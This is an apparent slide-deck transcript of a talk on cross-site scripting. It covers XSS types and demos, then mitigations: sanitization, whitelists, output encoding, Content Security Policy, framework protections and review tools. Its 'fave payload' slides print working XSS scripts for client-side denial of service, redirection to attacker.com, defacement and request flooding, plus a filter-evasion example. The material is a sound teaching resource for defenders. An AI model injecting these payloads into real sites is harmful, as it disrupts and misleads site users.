devouring security insufficient data validation risks cross site scripting
DESCRIPTION
Devouring Security: Insufficient Data Validation Risks - Cross Site Scripting (XSS) • Risk, Stories & the news • XSS Anatomy • Untrusted Data Sources – Well, Where did that come from? • Shouldn’t it be called CSS instead? • Types of XSS - Type 0 [DOM based] - Type 1 [Reflected or Non-persistent XSS] - Type 2 [Persistent or Stored XSS] • Live Demo: XSS 101 with alert('hello XSS world') • Live Demo: Cookie Hijacking and Privilege Escalation - Face/Off with John Travolta and Nicolas Cage • Live Demo: Let’s deploy some Key loggers,huh? • Mitigations - Input Sanitization - Popular Libraries for .Net, Java, php Demo: Input sanitization - Whitelists (vs. Blackists) - Output Encoding Contextual Demo: Output Encoding - Browser Protections & bypasses - Framework Protections & bypasses - Content Security Policy (CSP) in brief • Secure Code reviews: Spot an XSS, How? • Tools: Do we have an option? • XSS Buzz and how to Fuzz • Renowned Cheat sheets • Further reading & ReferencesTRANSCRIPT
Devouring Security
Insufficient Data Validation Risks
Cross Site Scripting
Marudhamaran Gunasekaran
Watch the screen recording of the presentation at https://vimeo.com/106302349
disclaimer
• Techniques and Tools in this presentation should be used or applied on an application, only with prior consent of the application’s owner. Illegal otherwise.
Irrational fear of risks against our children
https://www.schneier.com/blog/archives/2014/08/irrational_fear.html
Perfect security?
http://infosanity.files.wordpress.com/2010/06/dilbert-securitycia.gif
Information Security Triangle
XSS
• Html equivalent of Sql injection? Some say – it indeed is• “Breaking out of a data context and entering a code context” – Jeff
Williams, Chairperson, OWASP
XSS Anatomy
• Benign Input: http://app:8020/odern/AdvSearch?q=xxxxx• Input: xxxxx | Output: xxxxx
• Malicious Input: http://app:8020/odern/AdvSearch?q=<em>xxxxx</em>• Input: <em>xxxxx</em> | Output: <em>xxxxx</em>
• Malicious Input failure: http://app:8020/odern/AdvSearch?q=<em>xxxxx</em>• Input: <em>xxxxx</em> | Output: <em>xxxxx</em>
XSS Anatomy
• Remember your high school?
How you used to print a < > symbol on a html page by < >
Parsers in Browsers
Html Parser
CSS Parser
JavaScript Parser
XSS
• Breaking out of data context and entering the code context?
• By Code context? Do I mean?• Html markup• Html attributes• JavaScript• CSS (not the XSS CSS, but the Cascading Style Sheet CSS)• xml
Sources of untrusted data
• Url• Form data• Cookies• Request headers
• External services• Database
Request[“data”]$_REQUESTrequest.getParameter
Demo: XSS 101
• We know <script>alert(‘xss’);</script>
how about some Samy script?
Samy - http://namb.la/popular/tech.html
Formatted code: http://security.stackexchange.com/questions/37362/why-is-the-samy-worm-considered-xss
http://www.zdnet.com/tweetdeck-xss-worm-goes-viral-7000030436/
Auto send FB credentials to the Tunisian government via inserted javascript on non-https connection
XSS Types
• Type 0 – DOM Based• Type 1 – Reflected or Non-persistent XSS• Type 2 – Persistent or Stored XSS
Demo: Cookie hijacking and Privilege Escalation• Face/Off with John Travolta and Nicolas Cage
Demo: Cookie hijacking and Privilege Escalation• John Travolta – FBI• Nicolas Cage – Terrorist that planted the bomb.
• Where is the bomb? John Travolta would find it by tricking Nicolas Cage
My fave Payload: Dos the client
<script>var j=0;while(true){++j;setTimeout(function(){var i=0;while(true){++i;setTimeout(function(){var w=0;while(true){w++;}},0);}},0);}</script>
My fave Payload: Redirection
• <script>window.top.location=http://www.attacker.com;</script>
My fave Payload: Defacing
• <script>document.body.background=http://1.bp.blogspot.com/-ISLWH3-kFpo/Uai4UHCOcrI/AAAAAAAAAmA/a6y9Nq3Bk0g/s1600/logo_blue.gif;</script>
My fave Payload: Short XHR
• <script>cn=1;while(true){++cn;var w=window,r=w.XMLHttpRequest,j;if(r)r=new r();else for(j in{"Msxml2":1,"Microsoft":1})try{r=new ActiveXObject(j+".XMLHTTP");break}catch(e){}r.open("GET",document.location,false);r.send("");}</script>
• Better yet.. If you have jQuery
<script>$.get('http://prowarenesssecurity:8000/Pss/c.aspx‘);</script>
Input Sanitization
• Blacklist• Stop anything that starts with a < and followed by a character• Stop any words such as script, javascript, alert, xss• Stop the < > , “ ‘
• Fails because of elimentary evasive techniques like• <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet(Rsnake)
Blacklist vs Whitelist
• Blacklist – Don’t allow just the bad things I tell you, rest is fine
• What is bad? – anything that is bad today, anything the developer thinks
• Whitelist – Allow only these, I don’t care about the rest• What is good? – anything the business requires in the functionality
Don’t write your own Input Sanitizers• http://blog.codinghorror.com/protecting-your-cookies-httponly/
AntiXss libraries
• Microsoft AntiXss• AntiSamy for .Net, AntiSamy for Java• Reform for php
Microsoft AntiXss
• InputSanitizer• For purifying html input
• Encoder• For output encodring
Output encoding libraries
• https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
HttpOnly please!
Framework protections
• Ruby on Rails, ASP.Net MVC• XSS protections by default by output encoding
• But why developers don’t like it?• Why do they want to turn the framework protections off?
• Because they just do not want output encoding by default because it just does not look right• Because they want plain html to be rendered at the UI
• Say hello to ASP.Net MVC’s Html.Raw()
Framework Protections – Input validations• ASP.Net’s Request Validation
• Why is it there? When does it get triggered? Could we bypass it? Sure.
• <httpRuntime requestValidationMode="2.0" />• AllowHtml• ValidateInput(false)• ValidateRequest=false• Request.Unvalidated….
Use explicit input validation, or AntiXss librarieswhen you have request validations turned off
Browser defenses
• IE• Chrome• Safari
• X-XSS-Protection: 1; mode=block
Browser defenses and bypasses
• https://www.sysdream.com/sites/default/files/Abusing_IE8s_XSS_Filters%20(1).pdf
• https://blog.whitehatsec.com/internet-explorer-xss-filter/
• http://blog.elevenpaths.com/2014/01/how-to-bypass-antixss-filter-in-chrome.html
XSS Defences
• NoScript addon• Content-Security-Policy [No wide browser support yet especially IE]
Content Security Policy
• ‘xxx’ is the only domain you should my• Scripts• Styles• Images• Objects
from
Content Security Policy
• Blocking mode• Reporting mode
Tools: Watcher Addon for Fiddler (Passive scanning)
Tools: Xss Me addon for firefox (Active Scanning)• Demonstration at http://testfire.net/
Tools: Xenotix XSS Exploit Framework
Tools: ModSecurity (Web Application Firewall)
Tools: Zed Attack Proxy
Tools: Commercial tools?
• Go figure, shell out
XSS: Spot during code review
Source: 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them
XSS: Spot during code review
Source: 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them
Output encoding options
• php: • echo htmlentities($name)• ASP.Net code behind: • lblName.Text = "Hello, " + HttpUtility.HtmlEncode(txtValue.Text);• lblName.Text = "Hello," + AntiXss.HtmlEncode txtValue.Text);• ASPX view engine : • <%: data %>• Razor view engine: • @data
Code Review Tools
• Cat.Net still works with little tweaking on al older code base• Visual Code Grepper
Popular cheatsheets for XSS prevention• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://opensecurity.in/the-ultimate-xss-protection-cheat-sheet-for-developers/
:q!